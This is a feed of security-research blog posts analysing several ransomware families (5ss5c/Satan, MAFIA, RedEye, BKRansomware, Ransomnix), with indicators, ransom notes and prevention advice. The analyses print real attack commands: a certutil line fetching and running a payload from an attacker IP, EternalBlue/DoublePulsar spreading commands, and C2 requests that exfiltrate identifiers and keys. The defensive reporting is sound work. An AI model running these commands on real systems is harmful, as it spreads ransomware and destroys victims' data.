Reading view

Satan ransomware rebrands as 5ss5c ransomware


The cybercrime group that brought us Satan, DBGer and Lucky ransomware and perhaps Iron ransomware, has now come up with a new version or rebranding named "5ss5c".

In a previous blog post, Satan ransomware adds EternalBlue exploit, I described how the group behind Satan ransomware has been actively developing its ransomware, adding new functionalities (specifically then: EternalBlue) and techniques with each run. Then, it appeared the group halted operations on at least the ransomware front for several months.

However, as it turns out, the group has been working on new ransomware - 5ss5c - since at least November 2019.

The following tweet got my attention:

🧐Unknown #Ransomware captured tonight from #China, Encrypt only compressed files.
Email:5ss5c@mail.ru
ext:.5ss5c
IP:61.186.243.2 58.221.158.90@demonslay335 @Amigo_A_ @GrujaRS @BleepinComputer @Rmy_Reserve @VK_Intel pic.twitter.com/dTdgnMfoLX
— onion (@jishuzhain) January 12, 2020

After some quick checks, it appears this is a downloader for the 5ss5c ransomware, which is extremely reminiscent of how Satan ransomware operated:

Figure 1 - 5ss5c downloader












The malware will leverage certutil and even contains logging:

Figure 2 - certutil logging









It will download and leverage:

  • Spreader (EternalBlue and hardcoded credentials);
  • Mimikatz and what appears another password dumper/stealer;
  • The actual ransomware.

The following hashes are relevant to this new variant:

Name: down.txt
URL: http://58.221.158[.]90:88/car/down.txt
Purpose: Downloader
MD5: 680d9c8bb70e38d3727753430c655699
SHA1: 5e72192360bbe436a3f4048717320409fb1a8009
SHA256: ddfd1d60ffea333a1565b0707a7adca601dafdd7ec29c61d622732117416545f
Compilation timestamp: 2020-01-11 19:04:24
VirusTotal report:
ddfd1d60ffea333a1565b0707a7adca601dafdd7ec29c61d622732117416545f

down.txt is, as mentioned, the downloader for the spreader module and for the actual ransomware:

Name: c.dat
URL: http://58.221.158[.]90:88/car/c.dat
Purpose: spreader
MD5: 01a9b1f9a9db526a54a64e39a605dd30
SHA1: a436e3f5a9ee5e88671823b43fa77ed871c1475b
SHA256: 9a1365c42f4aca3e9c1c5dcf38b967b73ab56e4af0b4a4380af7e2bf185478bc
Compilation timestamp: 2020-01-11 19:19:54
VirusTotal report:
9a1365c42f4aca3e9c1c5dcf38b967b73ab56e4af0b4a4380af7e2bf185478bc

Name: cpt.dat
URL: http://58.221.158[.]90:88/car/cpt.dat
Purpose: ransomware
MD5: 853358339279b590fb1c40c3dc0cdb72
SHA1: 84825801eac21a8d6eb060ddd8a0cd902dcead25
SHA256: ca154fa6ff0d1ebc786b4ea89cefae022e05497d095c2391331f24113aa31e3c
Compilation timestamp: 2020-01-11 19:54:25
VirusTotal report:
ca154fa6ff0d1ebc786b4ea89cefae022e05497d095c2391331f24113aa31e3c
Fun fact: file version information contains "TODO: 5SS5C Encoder".

The compilation times are sequential, which makes sense - the downloader has been developed (and compiled) first, then the spreader and the actual ransomware.

Note that cpt.exe as filename has already been observed in Satan ransomware.

Further indicators, such as hashes, URLs, file paths and so on will be posted at the end of this blog post.


5ss5c - still in development - and with oddities

There's quite some curiosities that indicate 5ss5c is still in active development and stems from Satan ransomware, for example:

  • There are several logs created, e.g. there is a file "C:\Program Files\Common Files\System\Scanlog" that simply logs whether IPC SMB is open/available;
  • Certutil logging (successful download or not);
  • There are several Satan ransomware artefacts;
  • Other Tactics, Techniques and Procedures (TTP) align with both Satan (and DBGer), and slightly overlap with Iron: 
    • One of these is, for example, the use of multiple packers to protect their droppers and payloads. 
    • This time however, they decided to use both MPRESS and Enigma, and even Enigma VirtualBox! (Note: Enigma and Enigma VirtualBox are not the same - the latter is a virtualised packer and also referred to as EnigmaVM.)


However, there are quite some curiosities, one of them being what appear to be hardcoded credentials:

Figure 3 - Hardcoded creds




















These hardcoded credentials will be leveraged in an attempt to connect to an SQL database with the xp_cmdshell command:

Curiously, we can identify the following data inside the ransomware in regards to the SQL database:
  • ecology.url
  • ecology.password
  • ecology.user
Searching a bit further, we can discover a company named Finereport (https://www.finereport.com/en/company), which claims to be "Top 1 in China’s BI market share in IDC "China BI Software Tracker, 2018". You guessed it - it uses SQL as database.

What else is new is, as mentioned before, the use of Enigma VirtualBox for packing an additional spreader module, aptly named poc.exe. This suggest they may be experimenting (poc often is an acronym for proof of concept).

This file will be dropped to C:\ProgramData\poc.exe and will run the following command:

cd /D C:\ProgramData&star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload C:\ProgramData\down64.dll --TargetIp 
Now compare this to Satan ransomware's command:

cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp 
Something looks similar here... :-)


5ss5c ransomware - how it operates

Back to the actual ransomware. It will create the following mutexes:
  • SSSS_Scan (in previous iterations SSS_Scan has also been observed)
  • 5ss5c_CRYPT

Just like its predecessor, 5ss5c also has an exclusion list, where it will not encrypt specific files as well as files in the following folders:

Figure 4 - Exclusion list

















For example, the following folders belonging to Qihoo 360 (an internet security company based in China also offering antivirus) were already excluded in Satan and DBGer ransomware:

  • 360rec
  • 360sec
  • 360sand


While these are new in 5ss5c ransomware:

  • 360downloads
  • 360safe


As in previous iterations, 5ss5c ransomware will stop database-related services and processes.

It will however only encrypt files with the following extensions:
7z, bak, cer, csv, db, dbf, dmp, docx, eps, ldf, mdb, mdf, myd, myi, ora, pdf, pem, pfx, ppt, pptx, psd, rar, rtf, sql, tar, txt, vdi, vmdk, vmx, xls, xlsx, zip
This extension list is not like before, and includes mostly documents, archives, database files and VMware-related extensions such as vmdk.

The ransomware will then create the following URI structure to communicate with the C2 server (61.186.243[.]2):

  • /api/data.php?code=
  • &file=
  • &size=
  • &status=
  • &keyhash=
It will also create a ransomware note on the C:\ drive as: _如何解密我的文件_.txt which translates to _How to decrypt my file_.txt. Example content is as follows:

Figure 5 - ransom note














The content reads:


部分文件已经被加密
如果你想找回加密文件,发送 (1) 个比特币到我的钱包
从加密开始48小时之内没有完成支付,解密的金额会发生翻倍.
如果有其他问题,可以通过邮件联系我

您的解密凭证是 :
Email:[5ss5c@mail.ru]

Translated:

Some files have been encrypted
If you want to retrieve the encrypted file, send (1) Bitcoins to my wallet
If payment is not completed within 48 hours from the start of encryption, the amount of decryption will double.
If you have other questions, you can contact me by email
Your decryption credentials are:
Email: [5ss5c@mail.ru]

Interestingly, the ransomware note does not contain a Bitcoin address. Additionally, the note only contains instructions in Chinese, not Korean nor English like previous iterations. Is 5ss5c ransomware more targeted, or just actively being tested by the group/developers behind it?

Encrypted files will have the actor's email address prepended and a unique token with the ransomware's name will be appended, for example;
test.txt becomes [5ss5c@mail.ru]test.txt.Y54GUHKIG1T2ZLN76II9F3BBQV7MK4UOGSQUND7U.5ss5c.


Prevention
  • Enable UAC;
  • Enable Windows Update, and install updates (especially verify if MS17-010 is installed);
  • Install an antivirus, and keep it up-to-date and running;
  • Install a firewall, or enable the Windows Firewall;
  • Restrict, where possible, access to shares (ACLs);
  • Create backups! (and test them)
More ransomware prevention can be found here.

Conclusion

Satan is dead, long live 5ss5c! It just doesn't sound as good, does it?

Whoever's behind the development of Satan, DBGer, Lucky and likely Iron ransomware, is back in business with the 5ss5c ransomware, and it appears to be in active development - and is trying to increase (or perhaps focus?) its targeting and spread of the ransomware.

It is recommended organisations detect and/or search for the indicators of compromise (IOCs) below, and have proper prevention controls in place. MITRE ATT&CK IDs can also be found below.

Indicators of Compromise:



Type Indicator
File C:\Program Files\Common Files\System\Scanlog
File C:\Program Files\Common Files\System\cpt.exe
File C:\Program Files\Common Files\System\tmp
File C:\ProgramData\5ss5c_token
File C:\ProgramData\blue.exe
File C:\ProgramData\blue.fb
File C:\ProgramData\blue.xml
File C:\ProgramData\down64.dll
File C:\ProgramData\mmkt.exe
File C:\ProgramData\poc.exe
File C:\ProgramData\star.exe
File C:\ProgramData\star.fb
File C:\ProgramData\star.xml
Registry key SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5ss5cStart
Command C:\Windows\system32\cmd.exe /c cd /D C:\ProgramData&blue.exe --TargetIp
Command star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload C:\ProgramData\down64.dll --TargetIp
Mutex SSSS_Scan
Mutex 5ss5c_CRYPT
Email 5ss5c@mail.ru
URL http://58.221.158.90:88/car/down.txt
URL http://58.221.158.90:88/car/c.dat
URL http://58.221.158.90:88/car/cpt.dat
IP 58.221.158.90
IP 61.186.243.2
Hash 82ed3f4eb05b76691b408512767198274e6e308e8d5230ada90611ca18af046d
Hash dc3103fb21f674386b01e1122bb910a09f2226b1331dd549cbc346d8e70d02df
Hash 9a1365c42f4aca3e9c1c5dcf38b967b73ab56e4af0b4a4380af7e2bf185478bc
Hash af041f6ac90b07927696bc61e08a31a210e265a997a62cf732f7d3f5c102f1da
Hash ca154fa6ff0d1ebc786b4ea89cefae022e05497d095c2391331f24113aa31e3c
Hash e685aafc201f851a47bc926dd39fb12f4bc920f310200869ce0716c41ad92198
Hash e5bb194413170d111685da51b58d2fd60483fc7bebc70b1c6cb909ef6c6dd4a9
Hash ddfd1d60ffea333a1565b0707a7adca601dafdd7ec29c61d622732117416545f
Hash ef90dcc647e50c2378122f92fba4261f6eaa24b029cfa444289198fb0203e067
Hash 47fa9c298b904d66a5eb92c67dee602198259d366ef4f078a8365beefb9fdc95
Hash 68e644aac112fe3bbf4e87858f58c75426fd5fda93f194482af1721bc47f1cd7
Hash ea7caa08e115dbb438e29da46b47f54c62c29697617bae44464a9b63d9bddf18
Hash 23205bf9c36bbd56189e3f430c25db2a27eb089906b173601cd42c66a25829a7
Hash a46481cdb4a9fc1dbdcccc49c3deadbf18c7b9f274a0eb5fdf73766a03f19a7f
Hash cf33a92a05ba3c807447a5f6b7e45577ed53174699241da360876d4f4a2eb2de
Hash 8e348105cde49cad8bfbe0acca0da67990289e108799c88805023888ead74300
Hash ad3c0b153d5b5ba4627daa89cd2adbb18ee5831cb67feeb7394c51ebc1660f41
Hash de3c5fc97aecb93890b5432b389e047f460b271963fe965a3f26cb1b978f0eac
Hash bd291522025110f58a4493fad0395baec913bd46b1d3fa98f1f309ce3d02f179
Hash 75d543aaf9583b78de645f13e0efd8f826ff7bcf17ea680ca97a3cf9d552fc1f
Hash 50e771386ae200b46a26947665fc72a2a330add348a3c75529f6883df48c2e39
Hash 0aa4b54e9671cb83433550f1d7950d3453ba8b52d8546c9f3faf115fa9baad7e
Hash 5d12b1fc6627b0a0df0680d6556e782b8ae9270135457a81fe4edbbccc0f3552


These indicators are also available on AlienVault OTX:
Satan ransomware rebrands as 5ss5c ransomware

MITRE ATT&CK techniques



  •  

MAFIA ransomware targeting users in Korea


A new ransomware family was discovered and sent to me by MalwareHunterTeam, which we'll call MAFIA due to the extension it uses to encrypt files. The ransomware appears to target users in Korea, and may have been developed with at least knowledge of the Korean language.

Another interesting (and new to me) feature is the use of "Onion.Pet", a Tor proxy as a means for C2 (network) communication. Read the analysis below to find out more details on this ransomware. (not to be confused with MafiaWare, a Hidden Tear variant - the MAFIA ransomware described here is unique).


Analysis

It's currently unknown how the MAFIA ransomware reaches a system, but it's likely delivered via spear-phishing, rather than a manual installation. The binary analysed here has the following properties:

Properties:
First, MAFIA will attempt to stop a service named "AppCheck" by launching the following command (which will use an elevated CMD prompt):

sc stop AppCheck

Ransomware usually stops database processes, for it to be able to also encrypt database-files which may be in use by said processes. However, in this case, AppCheck is actually a service which belongs to an anti-ransomware product from South-Korea. Figure 1 shows a screenshot of its website.

Figure 1 - "100% Signatureless Anti-Ransomware" - https://www.checkmal.com/?lang=en

As for the effectiveness of this software: no idea, but the author deemed it important enough to include it, so either it has proven it works, or it is used by a lot of users and businesses.

The author of the MAFIA ransomware has also left a debug path, which mentions the name "Jinwoo" ("진우" in Korean), and may be an indicator of the developer's nationality.

MAFIA makes use of OpenSSL to encrypt files, which it does with AES-256 in CBC mode. As mentioned earlier, encrypted files will obtain the ".MAFIA" extension. For example; Penguins.jpg becomes Penguins.jpg.MAFIA.

Files with the following extensions (300 in total) will be encrypted:

.3dm, .3ds, .3fr, .3g2, .3gp, .3pr, .ab4, .accdb, .accde, .accdr, .accdt, .ach, .acr, .act, .adb, .ads, .agdl, .ait, .apj, .arw, .asf, .asm, .asp, .asx, .avi, .back, .backup, .backupdb, .bak, .bank, .bay, .bdb, .bgt, .bik, .bkp, .bkp, .blend, .bpw, .cdf, .cdr, .cdr3, .cdr4, .cdr5, .cdr6, .cdrw, .cdx, .ce1, .ce2, .cer, .cfp, .cgm, .cib, .class, .cls, .cmt, .cpi, .cpp, .cr2, .craw, .crt, .crw, .csh, .csl, .csv, .dac, .db-journal, .db3.dbf, .dc2, .dcr, .dcs, .ddd, .ddoc, .ddrw, .dds, .der, .des, .design, .dgc, .djvu, .dng, .doc, .docm, .docx, .dot, .dotm, .dotx, .drf, .drw, .dtd, .dwg, .dxb, .dxf, .dxg, .eml, .eps, .erbsql, .erf, .exf, .fdb, .ffd, .fff, .fhd, .fla, .flac, .flv, .fpx, .fxg, .gray, .grey, .gry, .hbk, .hpp, .ibank, .ibd, .ibz, .idx, .iif, .iiq, .incpas, .indd, .java, .jpe, .jpeg, .jpg, .kc2, .kdbx, .kdc, .key, .kpdx, .lua, .m4v, .max, .mdb, .mdc, .mdf, .mef, .mmw, .moneywell, .mos, .mov, .mp3, .mp4, .mpg, .mrw, .msg, .myd, .ndd, .nef, .nk2, .nop, .nrw, .ns2, .ns3, .ns4, .nsd, .nsf, .nsg, .nsh, .nwb, .nx2, .nx1, .nyf, .oab, .obj, .odb, .odc, .odf, .odg, .odm, .odp, .ods, .odt, .oil, .orf, .ost, .otg, .oth, .otp, .ots, .ott, .p12, .p7b, .p7c, .pab, .pages, .pas, .pat, .pcd, .pct, .pdb, .pdd, .pdf, .pef, .pem, .pfx, .php, .plc, .pot, .potm, .potx, .ppam, .pps, .ppsm, .ppsx, .ppt, .pptm, .pptx, .prf, .psafe3, .psd, .pspimage, .pst, .ptx, .qba, .qbb, .qbm, .qbr, .qbw, .qbx, .qby, .r3d, .raf, .rar, .rat, .raw, .rdb, .rtf, .rw2, .rw1, .rwz, .s3db, .sas7bdat, .say, .sd0, .sda, .sdf, .sldm, .sldx, sqlite, .sqlite3, .sqlitedb, .srf, .srt, .srw, .st4, .st5, .st6, .st7, .st8, .stc, .std, .sti, .stw, .stx, .svg, .swf, .sxc, .sxd, .sxg, .sxi, .sxm, .sxw, .tex, .tga, .thm, .tlg, .txt, .vob, .wallet, .wav, .wb2, .wmv, .wpd, .wps, .xll, .x3f, .xis, .xla, .xlam, .xlk, .xlm, .xlr, .xls, .xlsb, .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .ycbcra, .yuv, .zip, .alz, .jar, .png, .bmp, .a00, .gif, .egg

Note: because the MAFIA ransomware uses OpenSSL for encryption, the process is slow, and the user may be able to interrupt it by killing the process (typically named winlogin.exe), or by shutting down the machine.

Figure 2 shows a side-by-side visual representation of the original (left) and encrypted image (right).


Figure 2 - Comparison (the blue represents ASCII strings)

MAFIA will also create a ransom note in HTML named "Information" in the same location as the original dropper. Ironically enough, the ransom note will also have the ".mafia" extension appended - the file will not be encrypted however.

Figure 3 shows the ransom note, in a browser.

Figure 3 - Ransom note

The text translates from Korean ("고유넘버") as "Unique number", and appears to contain two unique identifiers.

As mentioned earlier, MAFIA will use a Tor proxy for C2 communication; an example request is as follows:

GET /mafiaEgnima.php?iv=0x9e0x4b0x410x5c0x480x3a0xf40x90x2f0xfa0x960xb90x9b0x830xd40xb7&key=0xb90x1e0x600x3d0xef0x6c0xe60x930x6d0xab0x420x7b0x50x350xf00xcd0x3c0x490xc30x5f0xa10xe0xda0x270x5d0xd50xd10xa40xc0x9f0x340x79&seq=cbdf395c9281ae2ec52a306b5c29ec5 HTTP/1.1
Host: wibkilmskir4rlxz.onion.pet
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36

It appears the ransomware tries to send out an encryption key and IV using an HTTP GET request, which could make it possible to decrypt files, granted the network traffic is inspected at that point.

There's several other binaries of MAFIA out there, such as:

f4b25591ae53504ef5923344a9f03563
da23c8a7be5d83ae3e6b7b3291fdb880
0776e348313c7680db86ed924cff10b8
6487edd9b1e7cf6be4a9b1ac57424548
119228fb8f4333b1c10ff03543c6c0ea

Three of these (119228fb8f4333b1c10ff03543c6c0ea, 0776e348313c7680db86ed924cff10b8 and 6487edd9b1e7cf6be4a9b1ac57424548) have a different C2 server, specifically:
wibkilmskir4rlxz.onion[.]plus.

Neither of these servers appeared to be online at time of writing.

Decryption is possible thanks to Michael Gillespie (@demonslay335).

Download the decrypter from:
https://download.bleepingcomputer.com/demonslay335/MAFIADecrypter.zip

In case of questions or feedback, be sure to leave a comment.


Indicators




  •  

RedEye ransomware: there's more than meets the eye



A rather anonymous account reached out to me on Twitter asking to check out a "scary & really nasty" sample.

It turned out to be RedEye ransomware, a new strain or variant by the same creator of Annabelle ransomware, which I discovered in February earlier this year.


Analysis

This ransomware is named "RedEye" by the author "iCoreX".














Properties:

The first noticeable thing about this file is the huge filesize: 35.0 MB (36657152 bytes). This is due to several media files, specifically images and audio files, embedded in the binary.

It contains three ".wav" files:
  • child.wav
  • redeye.wav
  • suicide.wav
All three audio files play a "creepy" sound, intended to scare the user. 

Additionally, the binary is protected with ConfuserEx, compression, and a few other tricks. It also embeds another binary, which is responsible for replacing the MBR, which has the following properties:

  • MD5: 878a10cda09fec2cb823f2b7138b550e
  • SHA1: db44dae60c12853cdbe62ec9f7b3493a897e519a
  • SHA256: f96ed49ab1a5b4e2333fee30c42b2ae28dc5bc74fa02b9c6989e5c0159cfffd7
  • Compilation timestamp (Delphi): 1992-06-19 22:22:17
  • Compilation timestamp (Actual): 2018-06-04 14:23:36
  • VirusTotal report:
    f96ed49ab1a5b4e2333fee30c42b2ae28dc5bc74fa02b9c6989e5c0159cfffd7


What actually happens when executing this ransomware? Just like Annabelle ransomware it will perform a set of actions to make removal quite difficult, for example; it will disable task manager and in this iteration, will also hide your drives.

Similar to before, a ransom message is then displayed as follows:

Figure 1 - RedEye Ransomware


The message reads:

All your personal files has been encrypted with an very strong key by RedEye!
(Rijndael-Algorithmus -  AES - 256 Bit)
The only way to get your files back is:
- Go to http://redeye85x9tbxiyki.onion/tbxIyki - Enter your Personal ID
and pay 0.1 Bitcoins to the adress below! After that you need to click on
 "Check Payment". Then you will get a special key to unlock your computer.
You got 4 days to pay, when the time is up,
then your PC will be fully destroyed!


The ransomware has several options which I won't be showing here, but in short, it can:

  • Show encrypted files
  • Decrypt files
  • Support
  • Destroy PC

The Destroy PC option shows a GIF as background where you have the option to select "Do it" and "Close". I won't display the image however.

RedEye claims to encrypt files securely with AES256. On my machine, it appears to overwrite or fill files with 0 bytes, rendering the files useless, and appending the ".RedEye" extension.

The machine will, when the time runs out or when the "Do it" option is selected, reboot and replace the MBR, again similar to Annabelle ransomware, with the following message:


Figure 2 - MBR lock screen

The message reads as follows:


RedEye Terminated your computer! 
The reason for that could be:
- The time has expired
- You clicked on the 'Destroy PC' button
 
There is no way to fix your PC! Have Fun to try it :)
My YouTube Channel: iCoreX ->Add me on discord!iCoreX#3333 ->


The author, iCoreX, claims to have created Jigsaw, Annabelle, and now the RedEye ransomware - whether the former is true or not, I'll leave in the middle.

Details on the ransomware:

Extension: .RedEye
BTC Wallet: 1JSHVxXnGDydVXVamFW9AEmk3vk8cF8Vuj
Payment portal: (currently offline): http://redeye85x9tbxiyki[.]onion

Currently, it doesn't appear any payments have been made as of yet:


Removal

You may be able to restore the MBR, or your files, if you catch the ransomware in the act, and shutdown the machine at that point. Reboot in safe mode and copy over or back-up your files.

If tools such as the registry editor are not working, run Rkill in safe mode first.

Then, Restore the MBR, and reinstall Windows.

You may also try to restore the MBR first, and consequently attempt to restore files using Shadow Volume Copies. For example, a tool such as Shadow Explorer can be of assistance, or read the tutorial here.

If that doesn't work either, you may try using a data recovery program such as PhotoRec or Recuva



Conclusion


While it appears that the RedEye ransomware has even more tricks up its sleeve than its predecessor Annabelle, the same conclusion holds true: do not pay the ransomware.

As for the actual purpose of the ransomware: it may be considered a ransomware of the wiper kind, however, it appears the author likes to showcase his or her skill.

You can read more on the purpose of ransomware here.



IOCs

  •  

Vietnamese ransomware wants you to add credit to a mobile phone


In this quick blog post we'll have a look at BKRansomware, a Vietnamese ransomware that wants you to top up its phone.

Update: 2018-05-06, scroll down for the update, added to the conclusion.


Analysis

This ransomware is named "BKRansomware" based on the file name and debug path. Properties:

BKRansomware will run via command line and displays the following screen:

Figure 1 - Ransom message

The ransomware message is very brief, and displays:

send 50k viettel to 0963210438 to restore your data

Viettel is a form of credit for mobile phones, used in Vietnam and neighboring countries. It is part of "Viettel Group" (Tập đoàn Công nghiệp Viễn thông Quân đội in Vietnamese), a mobile network operator in Vietnam. (Wiki link). 

As such, it appears the creators are in desperate need of more credit so they can make calls again :)


It only encrypts a small amount of extensions:


Figure 2 - extensions to encrypt

The list is as follows:

.txt, .cpp, .docx, .bmp, .doc, .pdf, .jpg, .pptx, .png, .c, .py, .sql

Encrypted files will have the .hainhc extension appended. Fun note: files aren't actually encrypted, but encoded with ROT23. For example, if you have a text file which says "password", the new content or file will now have "mxpptloa" instead.

Noteworthy is the debug path: 

C:\Users\Gaara\Documents\Visual Studio 2013\Projects\BKRansomware-20180503T093651Z-001\BKRansomware\Release\BKRansomware.pdb

The extension mentioned above, "hainhc" may refer to the following handle or persona on Whitehat VN, a Vietnamese Network security community:
https://whitehat.vn/members/hainhc.59556/



Conclusion

While BKRansomware is not exactly very sophisticated, it is able to encrypt (or rather encode) files, and is unique in the sense that it asks you to top up a mobile phone.

Update: it appears this is a ransomware supposedly used for testing purposes, for both coding and testing VirusTotal detections. However, there seems to be a lot of "testing" going on, including keyloggers. Draw your own conclusions.

Follow the prevention tips here to stay safe.



IOCs


  •  

Ransomnix ransomware variant encrypts websites



Ransomnix is a (supposedly Jigsaw, but not really) ransomware variant that holds websites for ransom, and encrypts any files associated with the website.

This ransomware was discovered in the second half of 2018, and there's a brief write-up by Amigo-A here as well: Ransomnix ransomware

In this blog post, we'll discuss a newer variant.


Analysis

Several encrypted websites were discovered, which display the following message:

Figure 1 - Ransom message, part 1

Figure 2 - Ransom message, part 2

The full message is as follows:


JIGSAW RANSOMNIX 2018
I WANT TO PLAY A GAME!
Now Pay 0.2 BTC
OR
Payment will increase by
0.1
BTC each day after
00:00:00
Your Key Will Be Deleted
Your Bill till now 2.4000000000000004 BTC
Dear manager, on
Fri Apr 06 2018 02:08:34 GMT+0100 (GMT Summer Time)
your database server has been locked, your databases files are encrypted
and you have unfortunately "lost" all your data, Encryption was produced using
unique public key RSA-2048 generated for this server.
To decrypt files you need to obtain the private key.
All encrypted files ends with .Crypt
Your reference number: 4027
To obtain the program for this server, which will decrypt all files,
you need to pay 0.2 bitcoin on our bitcoin address 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o (today 1 bitcoin was around 15000 $).
After payment send us your number on our mail crypter@cyberservices.com and we will send you decryption tool (you need only run it and all files will be decrypted during a few hours depending on your content size).
Before payment you can send us one small file (100..500 kilobytes) and we will decrypt it!
It's your guarantee that we have decryption tool. (use your reference number as a subject to your message)
We don't know who are you, All what we need is some money.
Don't panic if we don't answer you during 24 hours. It means that we didn't received your letter and write us again.
You can use one of that bitcoin exchangers for transfering bitcoin.
https://localbitcoins.com
https://www.kraken.com
You dont need install bitcoin programs - you need only use one of this exchangers or other exchanger that you can find in www.google.com for your country.
Please use english language in your letters. If you don't speak english then use https://translate.google.com to translate your letter on english language.
You do not have enough time to think each day payment will increase by
0.1 BTC and after one week your privite key will be deleted and your files will be locked for ever.

People use cryptocurrency for bad choices,
 but today you will have to use it to pay for your files!
 It's your choice!

The following JavaScript is responsible for keeping track of the price, and increasing it:

Figure 3 - JS function

The starting price is set at 0.2 BTC, but will increase every day with 0.1 BTC thanks to two functions: inprice and startTimer.
The function for calculating the time and date, startTimer, is a copy/paste from the following StackOverflow answer: The simplest possible JavaScript countdown timer?

Note that the start_date variable, 1522976914000, is the epoch timestamp in milliseconds, which converted is indeed Friday 6 April 2018 01:08:34, as mentioned in the ransom note.

Ransomware message details:

BTC Wallet: 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o
Email: crypter@cyberservices.com 
Extension: .Crypt

Files will be encrypted, as claimed by the cybercriminals, with RSA-2048.

Unfortunately, it appears several people have already paid for decryption: 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o


Disinfection

If possible, restore the website from a backup, and consequently patch your website, this means: install all relevant and security patches for your CMS, and plugins where applicable.

Then, change all your passwords. Better be safe than sorry.

It is currently unknown if decryption is possible. If you have an example of an encrypted file, please do upload it to ID Ransomware and NoMoreRansom, to see if decryption is possible, or if a decryptor can be developed.


Prevention

For preventing ransomware that attacks your websites, you can follow my prevention tips here.

General ransomware prevention tips can be found here.


Conclusion

Ransomware can in theory be installed on everything; whether it's your machine, your website, or your IoT device. Follow the prevention tips above to stay safe.

Remember: create backups, regularly, and test them as well.



IOCs

  •  

Satan ransomware adds EternalBlue exploit


Today, MalwareHunterTeam reached out to me about a possible new variant of Satan ransomware.

Satan ransomware itself has been around since January 2017 as reported by Bleeping Computer.

In this blog post we'll analyse a new version of the infamous Satan ransomware, which since November 2017 has been using the EternalBlue exploit to spread via the network, and consequently encrypt files.


Analysis

First up is a file inconspicuously named "sts.exe", which may refer to "Satan spreader".


The file is packed with PECompact 2, and is therefore only 30KB in filesize. 

Notably, Satan has used different packers in multiple campaigns, for example, it has also used UPX and WinUpack. This is possibly due to a packer option in the Satan RaaS builder. Fun fact: Iron ransomware, which may be a spin-off from Satan, has used VMProtect.

"sts.exe" acts as a simple downloader, and will download two new files, both SFX archives, and extract them with a given password:


Figure 1 - download and extract two new files

Both files will be downloaded from 198.55.107[.]149, and use a custom User-Agent "RookIE/1.0", which seems a rather unique User-Agent.
  • ms.exe has password: iamsatancryptor
  • client.exe has password: abcdefghijklmn
It appears the Satan ransomware developers showcase some sense of humor by using the password "iamsatancryptor". 

Once the user has executed "sts.exe", they will get the following UAC prompt, if enabled:

Figure 2 - UAC prompt

Client.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and will hold the actual Satan ransomware, named "Cryptor.exe". Figure 2 shows the command line options.

Curiously, and thanks to the s2 option, the start dialog will be hidden, but the extraction progress is displayed - this means we need to click through to install the ransomware. Even more curious: the setup is in Chinese.

Figure 3 - End of setup screen

ms.exe (770ddc649b8784989eed4cee10e8aa04) on the other hand will drop and load the EternalBlue exploit, and starts scanning for vulnerable hosts. Required files will be dropped in the C:\ProgramData folder, as seen in Figure 3. Note it uses a publicly available implementation of the exploit - it does not appear to use its own.

The infection of other machines on the network will be achieved with the following command:

cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp 

We can then see an attempt to spread the ransomware to other machine in the same network:

Figure 4 - Spreading attempt over SMB, port 445

down64.dll (17f8d5aff617bb729fcc79be322fcb67) will be loaded in memory using DoublePulsar, and executes the following command:

cmd.exe /c certutil.exe -urlcache -split -f http://198.55.107.149/cab/sts.exe c:/sts.exe&c:\sts.exe

This will be used for planting sts.exe on other machines in the network, and will consequently be executed.

Satan ransomware itself, which is contained in Client.exe, will be dropped to C:\Cryptor.exe.

This payload is also packed with PECompact 2. As usual, any database-related services and processes will be stopped and killed, which it does to also encrypt those files possibly in use by another process.

Figure 5 - Database-related processes

What's new in this version of Satan, is that the exclusion list has changed slightly - it will not encrypt files with the following words in its path:

windows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all users, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public, 360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer, windows sidebar, default user

This exclusion list is reminiscent of Iron ransomware. (or vice-versa)

Satan will, after encryption, automatically open the following ransomware note: C:\_How_to_decrypt_files.txt:


Figure 6 - Ransom note


The note is, as usual, in English, Chinese and Korean, and demands the user to pay 0.3 BTC. Satan will prepend filenames with its email address, satan_pro@mail.ru, and append extensions with .satan. For example: [satan_pro@mail.ru]Desert.jpg.satan

BTC Wallet: 14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo 
Email: satan_pro@mail.ru
Note: _How_to_decrypt_files.txt

It appears one person has already paid 0.2 BTC:
https://blockchain.info/address/14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo

Satan will create a unique mutex, SATANAPP, so the ransomware won't run twice. It will also generate a unique hardware ID and sends this to the C2 server:

GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
HTTP/1.1 
Connection: Keep-Alive 
User-Agent: Winnet Client 
Host: 198.55.107.149

As mentioned in the beginning of this blog post, Satan ransomware has been using EternalBlue since at least November 2017 last year. For example, 25005f06e9b45fad836641b19b96f4b3 is another downloader which works similar to what is posted in this blog. It would fetch the following files:

  • http://122.114.9.220/data/client.exe
  • http://122.114.9.220/data/ms.exe
  • http://122.114.9.220/data/winlog.exe

According to VirusTotal, the downloader file was uploaded:
2017-11-20 18:35:17 UTC ( 5 months ago )

For additional reading, read this excellent post by Tencent, who discovered a similar variant using EternalBlue earlier in April this year.


Disinfection

You may want to verify if any of the following files or folders exist:

  • C:\sts.exe
  • C:\Cryptor.exe
  • C:\ProgramData\ms.exe
  • C:\ProgramData\client.exe
  • C:\Windows\Temp\KSession

